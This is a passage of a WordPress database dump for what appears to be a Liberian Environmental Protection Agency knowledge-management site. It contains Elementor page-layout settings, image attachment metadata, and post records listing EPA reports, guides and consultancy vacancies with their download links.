Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(32050,4580,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(32051,4580,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(32052,4580,'_elementor_controls_usage','a:10:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:5;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:2;s:7:\"padding\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:6:\"layout\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:1:{s:21:\"background_background\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}}}s:25:\"theme-post-featured-image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:2:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:1;}s:18:\"section_text_style\";a:3:{s:10:\"text_color\";i:2;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;}}}}s:18:\"theme-post-content\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:7:\"link_to\";i:1;s:10:\"image_size\";i:1;s:4:\"link\";i:1;s:5:\"image\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}s:8:\"advanced\";a:2:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:2;}s:15:\"_section_border\";a:2:{s:14:\"_border_border\";i:2;s:13:\"_border_width\";i:2;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:5:{s:4:\"menu\";i:2;s:11:\"align_items\";i:2;s:7:\"pointer\";i:2;s:6:\"layout\";i:1;s:12:\"submenu_icon\";i:1;}}s:5:\"style\";a:1:{s:23:\"section_style_main-menu\";a:5:{s:15:\"color_menu_item\";i:2;s:21:\"color_menu_item_hover\";i:2;s:28:\"padding_horizontal_menu_item\";i:2;s:26:\"padding_vertical_menu_item\";i:2;s:18:\"menu_space_between\";i:2;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:2;s:8:\"_padding\";i:2;}}}}s:25:\"jet-blog-posts-navigation\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_general\";a:2:{s:15:\"show_post_title\";i:1;s:9:\"next_icon\";i:1;}}s:5:\"style\";a:1:{s:11:\"items_style\";a:1:{s:11:\"items_color\";i:1;}}}}}'),(32054,4582,'_edit_lock','1645805759:42'),(32055,4582,'_last_editor_used_jetpack','block-editor'),(32056,4583,'_wp_attached_file','2022/02/news.jpg'),(32057,4583,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/02/news.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"news-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"news-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"news-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"news-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"news-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"news-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"news-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"news-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"news-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"news-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(32060,4582,'_thumbnail_id','4583'),(32061,4582,'_edit_last','42'),(32064,4582,'kava_extra_enable_breadcrumbs','inherit'),(32065,4582,'post_formats',''),(32066,4582,'gallery_tab',''),(32067,4582,'kava_extra_gallery_images',''),(32068,4582,'link_tab',''),(32069,4582,'kava_extra_link',''),(32070,4582,'kava_extra_link_target','_blank'),(32071,4582,'quote_tab',''),(32072,4582,'kava_extra_quote_text',''),(32073,4582,'kava_extra_quote_cite',''),(32074,4582,'audio_tab',''),(32075,4582,'kava_extra_audio',''),(32076,4582,'kava_extra_audio_loop','false'),(32077,4582,'kava_extra_audio_autoplay','false'),(32078,4582,'kava_extra_audio_preload','false'),(32079,4582,'video_tab',''),(32080,4582,'kava_extra_video_type','library'),(32081,4582,'kava_extra_video_library',''),(32082,4582,'kava_extra_video_external',''),(32083,4582,'kava_extra_video_poster',''),(32084,4582,'kava_extra_video_width','770'),(32085,4582,'kava_extra_video_height','480'),(32086,4582,'kava_extra_video_loop','false'),(32087,4582,'kava_extra_video_autoplay','false'),(32088,4582,'kava_extra_video_preload','false'),(32089,4586,'_menu_item_type','custom'),(32090,4586,'_menu_item_menu_item_parent','0'),(32091,4586,'_menu_item_object_id','4586'),(32092,4586,'_menu_item_object','custom'),(32093,4586,'_menu_item_target',''),(32094,4586,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(32095,4586,'_menu_item_xfn',''),(32096,4586,'_menu_item_url','https://census.lisgis.gov.lr/'),(32098,2078,'_wp_old_date','2021-09-08'),(32099,2081,'_wp_old_date','2021-09-08'),(32100,2080,'_wp_old_date','2021-09-08'),(32101,2079,'_wp_old_date','2021-09-08'),(32102,2082,'_wp_old_date','2021-09-08'),(32103,2702,'_wp_old_date','2021-09-08'),(32104,4282,'_wp_old_date','2021-09-08'),(32105,4283,'_wp_old_date','2021-09-08'),(32106,4284,'_wp_old_date','2021-09-08'),(32107,4587,'_last_editor_used_jetpack','classic-editor'),(32108,4587,'_edit_lock','1647524632:42'),(32109,4587,'_edit_last','42'),(32110,4588,'_wp_attached_file','2022/03/Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf.png'),(32111,4588,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:72:\"2022/03/Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:72:\"Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:71:\"Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:72:\"Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:72:\"Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:72:\"Screenshot-2022-03-17-at-13-33-09-EPA-2021-ANNUAL-REPORT.pdf-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32112,4589,'_wp_attached_file','2022/03/EPA-2021-ANNUAL-REPORT.pdf'),(32113,4587,'_wp_page_template','default'),(32114,4587,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/03/EPA-2021-ANNUAL-REPORT.pdf'),(32115,4587,'by','EPA'),(32116,4587,'year','2021'),(32117,4587,'_pods_document_cover_image','a:1:{i:0;i:4588;}'),(32118,4587,'document_cover_image','4588'),(32119,4587,'_pods_attached_document','a:1:{i:0;i:4589;}'),(32120,4587,'attached_document','4589'),(32121,4591,'_last_editor_used_jetpack','classic-editor'),(32122,4591,'_edit_lock','1647531114:42'),(32123,4591,'_edit_last','42'),(32124,4592,'_wp_attached_file','2022/03/Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf.png'),(32125,4592,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:88:\"2022/03/Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:88:\"Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:88:\"Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:88:\"Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:87:\"Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:88:\"Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:88:\"Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:88:\"Screenshot-2022-03-17-at-13-30-50-EPA-2022-Consolidated-Annual-Work-Plan.pdf-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32126,4593,'_wp_attached_file','2022/03/EPA-2022-Consolidated-Annual-Work-Plan.pdf'),(32127,4591,'_wp_page_template','default'),(32128,4591,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/03/EPA-2022-Consolidated-Annual-Work-Plan.pdf'),(32129,4591,'by','EPA'),(32130,4591,'year','2022'),(32131,4591,'_pods_document_cover_image','a:1:{i:0;i:4592;}'),(32132,4591,'document_cover_image','4592'),(32133,4591,'_pods_attached_document','a:1:{i:0;i:4593;}'),(32134,4591,'attached_document','4593'),(32141,4608,'_last_editor_used_jetpack','classic-editor'),(32142,4608,'_edit_lock','1650447730:42'),(32143,4608,'_edit_last','42'),(32144,4609,'_wp_attached_file','2022/04/Screenshot-2022-04-20-at-08-46-54-ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf.png'),(32145,4609,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:84:\"2022/04/Screenshot-2022-04-20-at-08-46-54-ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:84:\"Screenshot-2022-04-20-at-08-46-54-ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:84:\"Screenshot-2022-04-20-at-08-46-54-ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:83:\"Screenshot-2022-04-20-at-08-46-54-ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:84:\"Screenshot-2022-04-20-at-08-46-54-ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32146,4610,'_wp_attached_file','2022/04/ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf'),(32147,4608,'_wp_page_template','default'),(32148,4608,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/04/ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf'),(32149,4608,'by','EPA'),(32150,4608,'year','2022'),(32151,4608,'_pods_document_cover_image','a:1:{i:0;i:4609;}'),(32152,4608,'document_cover_image','4609'),(32153,4608,'_pods_attached_document','a:1:{i:0;i:4610;}'),(32154,4608,'attached_document','4610'),(32155,4612,'_last_editor_used_jetpack','classic-editor'),(32156,4612,'_edit_lock','1650445307:42'),(32157,4612,'_edit_last','42'),(32158,4613,'_wp_attached_file','2022/04/Screenshot-2022-04-20-at-08-46-18-2021-Revised-Fees-regime-for-publication.pdf.png'),(32159,4613,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:90:\"2022/04/Screenshot-2022-04-20-at-08-46-18-2021-Revised-Fees-regime-for-publication.pdf.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:90:\"Screenshot-2022-04-20-at-08-46-18-2021-Revised-Fees-regime-for-publication.pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:90:\"Screenshot-2022-04-20-at-08-46-18-2021-Revised-Fees-regime-for-publication.pdf-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:89:\"Screenshot-2022-04-20-at-08-46-18-2021-Revised-Fees-regime-for-publication.pdf-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:90:\"Screenshot-2022-04-20-at-08-46-18-2021-Revised-Fees-regime-for-publication.pdf-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32160,4614,'_wp_attached_file','2022/04/2021-Revised-Fees-regime-for-publication.pdf'),(32161,4612,'_wp_page_template','default'),(32162,4612,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/04/2021-Revised-Fees-regime-for-publication.pdf'),(32163,4612,'by','EPA'),(32164,4612,'year','2021'),(32165,4612,'_pods_document_cover_image','a:1:{i:0;i:4613;}'),(32166,4612,'document_cover_image','4613'),(32167,4612,'_pods_attached_document','a:1:{i:0;i:4614;}'),(32168,4612,'attached_document','4614'),(32175,4618,'_last_editor_used_jetpack','classic-editor'),(32176,4618,'_edit_lock','1650640099:42'),(32177,4618,'_edit_last','42'),(32179,4620,'_wp_attached_file','2022/04/EPA-Ads-for-Local-Consultant-1.pdf'),(32180,4618,'_wp_page_template','default'),(32181,4618,'_wp_old_date','2022-04-21'),(32182,4618,'closed_date','2022-04-11'),(32183,4618,'owner','EPA'),(32184,4618,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/04/EPA-Ads-for-Local-Consultant-1-1.pdf'),(32185,4622,'_last_editor_used_jetpack','classic-editor'),(32186,4622,'_edit_lock','1650550941:42'),(32187,4622,'_edit_last','42'),(32188,4623,'_wp_attached_file','2022/04/ToR-for-developing-TORs_High-resolution-Multi-criteria-vulnerability-assessment-Activity-2.1.1.1_MMCRP-1_MME-Inputs.pdf'),(32189,4622,'_wp_page_template','default'),(32190,4622,'_wp_old_date','2022-04-21'),(32191,4622,'closed_date','2022-04-29'),(32192,4622,'owner','EPA'),(32193,4622,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/04/ToR-for-developing-TORs_High-resolution-Multi-criteria-vulnerability-assessment-Activity-2.1.1.1_MMCRP-1_MME-Inputs.pdf'),(32194,4626,'_wp_attached_file','2022/04/EPA-Ads-for-Local-Consultant-1-1.pdf'),(32195,4627,'_last_editor_used_jetpack','classic-editor'),(32196,4627,'_edit_lock','1650640805:42'),(32197,4627,'_edit_last','42'),(32198,4628,'_wp_attached_file','2022/04/Request-for-Expression-of-Interest-for-Consultancy-to-draft-updated-National-Capacity-Self-Assessment-Final-Report.pdf'),(32199,4629,'_wp_attached_file','2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-Prepare-a-Lessons-learned-study-on-the-piloting-of-an-environmental-awareness-module-into-school-curricula.pdf'),(32200,4630,'_wp_attached_file','2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-draft-and-validate-guidelines-for-coordinated-monitoring-and-compliance-of-global-environment.pdf'),(32201,4631,'_wp_attached_file','2022/04/Request-for-Expresion-of-Interest-preparation-of-technical-guidance-materials-for-planners-and-other-usersof-indicators-relevant-to-global-environment.pdf'),(32202,4632,'_wp_attached_file','2022/04/Request-for-Expression-of-Interest-to-air-jingles-and-Public-Service-Announcement.pdf'),(32203,4633,'_wp_attached_file','2022/04/EPA-Ads-for-Local-Consultant-1-2.pdf'),(32204,4627,'_wp_page_template','default'),(32205,4627,'_wp_old_date','2022-04-22'),(32206,4627,'closed_date','2022-02-28'),(32207,4627,'owner','EPA'),(32208,4627,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-Consultancy-to-draft-updated-National-Capacity-Self-Assessment-Final-Report.pdf'),(32209,4635,'_last_editor_used_jetpack','classic-editor'),(32210,4635,'_edit_lock','1650640958:42'),(32211,4635,'_edit_last','42'),(32212,4635,'_wp_page_template','default'),(32213,4635,'_wp_old_date','2022-04-22'),(32214,4635,'closed_date','2022-02-28'),(32215,4635,'owner','EPA'),(32216,4635,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-Prepare-a-Lessons-learned-study-on-the-piloting-of-an-environmental-awareness-module-into-school-curricula.pdf'),(32217,4637,'_last_editor_used_jetpack','classic-editor'),(32218,4637,'_edit_lock','1650641238:42'),(32219,4637,'_edit_last','42'),(32220,4637,'_wp_page_template','default'),(32221,4637,'_wp_old_date','2022-04-22'),(32222,4